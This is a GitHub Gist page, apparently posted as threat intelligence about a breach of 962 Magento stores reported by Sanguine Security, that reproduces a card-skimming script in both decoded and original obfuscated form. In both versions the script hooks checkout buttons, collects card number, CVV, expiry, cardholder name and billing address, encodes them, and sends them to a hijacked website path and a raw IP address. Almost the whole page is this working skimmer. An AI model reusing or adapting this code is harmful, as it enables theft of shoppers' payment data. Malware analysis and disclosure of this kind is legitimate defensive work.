-
-
Save yonixw/550b984f406adb3a298d1b81eb9d2c58 to your computer and use it in GitHub Desktop.
962 stores found breached on the 4th of July - https://sansec.io
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Decoded by Sanguine Security <info@sansec.io> | |
| String.prototype.hexEncode = function() { | |
| var a, b; | |
| var output = ''; | |
| for (b = 0; b < this.length; b++) { | |
| a = this.charCodeAt(b).toString(16); | |
| output += ('000' + a).slice(-4) | |
| }; | |
| return output | |
| }; | |
| function obfuscate(arg) { | |
| var b64 = btoa(arg); | |
| var b64hex = (b64.hexEncode()); | |
| var blob = ''; | |
| for (var i = 0; i < b64hex.length; i++) { | |
| blob += (b64hex[i].charCodeAt(0) << 3) + '*' | |
| }; | |
| var blobb64 = btoa(blob); | |
| return blobb64 | |
| } | |
| function addtoev() { | |
| var allButtons = document.getElementsByClassName('button'); | |
| for (i = 0; i < allButtons.length; i++) { | |
| allButtons[i].addEventListener('click', function() { | |
| var ccCounter = ''; | |
| var serialPayload = ''; | |
| if (document.getElementsByName('payment[cc_number]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_cid]')[0]) { | |
| ccCounter = document.getElementsByName('payment[cc_cid]')[0].value; | |
| serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_exp_month]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_exp_year]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_owner]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[firstname]')[0]) { | |
| serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[lastname]')[0]) { | |
| serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[telephone]')[0]) { | |
| serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[street][]')[0]) { | |
| serialPayload += document.getElementsByName('billing[street][]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[city]')[0]) { | |
| serialPayload += document.getElementsByName('billing[city]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[postcode]')[0]) { | |
| serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[region_id]')[0]) { | |
| serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('shipping[country_id]')[0]) { | |
| serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|' | |
| }; | |
| if (ccCounter != '') { | |
| var payloadObj = { | |
| Domain: 'all', | |
| d: obfuscate(serialPayload) | |
| }; | |
| rand = Math.floor((Math.random() * 1000000) + 1); | |
| urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj)); | |
| var req1 = new XMLHttpRequest(); | |
| req1.open('GET', urll, false); | |
| req1.send(); | |
| urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj)); | |
| var req2 = new XMLHttpRequest(); | |
| req2.open('GET', urll, false); | |
| req2.send() | |
| } | |
| }) | |
| } | |
| } | |
| window.addEventListener('load', function() { | |
| addtoev() | |
| }) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()}) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment